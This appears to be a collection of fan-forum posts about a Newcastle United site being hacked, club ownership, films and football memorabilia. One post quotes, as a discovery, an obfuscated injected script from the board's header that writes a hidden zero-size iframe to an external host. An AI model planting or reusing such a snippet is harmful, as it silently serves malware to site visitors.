  1. tbf, you (and everyone else who uses this site including me) browse it from work at your own risk. The site has been hacked and trying to sort it out is like finding a needle in a haystack. The response may seem lax but that's because we know just about as much as you do. I'm spending as much time as I can reading into what's possibly gone on by reading through support forums. We don't yet know if it's the site, the software, the server, or whatever else that's infected so simply starting again may not provide the solution. Sorry I can't be of more help.
  2. Agree but I've already done more than I can afford (time-wise) to do. Things are being done behind the scenes to try and rectify it but there's only so much work evasion I can do. We need to upgrade which we've got problems with. We need to change passwords to the back-end stuff which I've asked Pud to do - I don't have the know-how on that one.
  3. You planning something for Sports Direct Towers? Nah... just got a 'spike' of *cough* backed up *cough* films to watch. WTC was on the top and after I watched it, thought U93 would be the best thing to follow it up with.
  4. I'm not getting it now and was before.... It's getting more and more weird as we go on.
  5. West Ham's are probably as good as any IMO.
  6. 47 miles from my normal place of work. I drive and usually can get there within an hour.
  7. There are issues - there's a thread about it in the Help forum.
  8. Watched United 93 last night... surprisingly good...
  9. That is the truly frightening thing - the depth of incompetence that keeps being demonstrated by Ashley Llambias Wise, whichever of them is making decisions is astounding. There seems to be absolutely no understanding of our position, what is needed for the future or how to get there. Leadership is completely absent, no one is responsible for anything, and the recent attempts at communication have been almost worse than the silence that preceeded it. I genuinely am worried for the future of the club, probably more so if Ashley isnt trying to asset strip and turn a profit. If he thinks the current situation and management of it is anywhere near satisfactory he is completely deluded Aye, they seem oblivious to the seriousness of the situation as though it's a case of everything being ok, if not ideal. I think that they think they have plenty of time to do what they want with their 'business plan', what they don't realise is that football isn't like any other business. For one thing - good players, managers and coaches etc. are finite and (usually) expensive resources. They can also afford to be choosy about who they work for. Which is a little bit different to how Sports Direct does things. All joking aside, it's quite scary to comprehend that he's applied the same business model to Newcastle United. I can't understand how the bloke is so rich tbh - rather than decent business acumen, it's surely a case of him having been in the right place at the right time?
  10. World Trade Center... I was shocked when looking it up on IMDB afterwards that it's Oliver Stone. Utter shite
  11. Damn you fuckers for pandering to her... there's another 3½ years worth to read through - we'll not see her for some time

aye but they inverted meet with the Mig was taking the piss a bit... In all seriousness, I think it's a bit different when you're not expecting to see (or indeed looking for) another plane.
  13. Umbro are claiming that these images are not genuine. Hmmm - what's not genuine, the images or the design itself? Very loose response from Umbro. Hope to fuck it is the design that's not genuine though.

http://news.bbc.co.uk/1/hi/uk/7892448.stm I reckon RobW was late for his dinner....
  16. Back again for me with a different link. Fuck's sake - I can't beat this...
  17. Deleted again. Upgrade is not as straight forward as we think. Working on it (i believe).
  18. Beyond Google Maps (which ties in well with the GPS) I haven't really installed anything. However the phone techno at work is a good mate of mine and he's using the same phone. Will find out if he's found anything worth adding
  19. The Boy In The Striped Pyjamas - Great film that really did expose the shame that was felt at the time 8/10 Seven Pounds - Good ending, but my god was the plot slow? I'd worked out what was going on pretty early on and found myself wanting to hurry him up. Spoiled by the jellyfish though - put a massive hole in the plot. 6/10 Slumdog Millionaire - cleverly done - good all round film despite it seeming like The Usual Suspects meets Forrest Gump. 7/10
  20. Hmmmm - i found this imbedded in the board header/footer wrapper..... <script type="text/javascript"> document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%61%66%6D%2E%63%6E%2F%64%6C%6C%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E')); </script> I haven't got a scooby and what concerns me more is I've locked down those files for edit so I can't understand how they've been changed. I've deleted this shit so hopefully it'll be behaving once more for you guys. BTW - if anyone has an ideas as to what the fuck that code is all about, I'd be grateful.
  21. Nar it's Everton v Chelsea at Woodison. The Everton player is obviously Graeme Sharp, Colin Pates on the left, and the uncapped jock Doug Rougvie in the middle. What's the 'West Ham United' bit for? Have a guess. What are you on about Tom? It's a programme for Chelsea-West Ham. The picture on the front is Chelsea (in their reddy-orange away kit) against Everton. Am I missing something? Who the hell is John Anderson btw?

I can't understand how people on foot don't know they are coming, yeah if you're deaf and blind you'd be in trouble but otherwise getting hit by a train is like not noticing the bus whose path you've just stepped into. You could see it happening with a bus though I suppose - you know, a busy street and you step out (it could also be obscured etc.). A train though? How do you miss that coming? I don't think it's necessarily a point of them missing the train, I think most of them who are hit (or nearly hit) haven't considered how fast it's actually moving. Stand on a platform in a station an watch a train move through that station without stopping. As it's approaching, it doesn't necessarily appear to be moving that quick but when it passes you, it almost knocks you off your feet.
  23. Yep - I've eradicated the problem, that's why No-one's getting it now.
